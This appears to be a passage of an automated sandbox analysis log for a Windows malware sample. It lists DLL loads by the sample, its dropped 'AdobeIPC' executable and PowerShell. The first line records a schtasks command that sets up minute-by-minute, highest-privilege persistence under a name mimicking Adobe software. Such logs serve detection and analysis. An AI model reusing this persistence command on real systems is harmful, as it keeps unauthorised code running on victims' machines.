Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AdobeIPC" /tr "C:\ProgramData\AdobeIPC"	Jump to behavior

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: mscoree.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: apphelp.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: version.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: uxtheme.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: sspicli.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: cryptsp.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: rsaenh.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: cryptbase.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: version.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: version.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\AdobeIPC.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: mscoree.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: version.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\AdobeIPC	Section loaded: ucrtbase_clr0400.dll
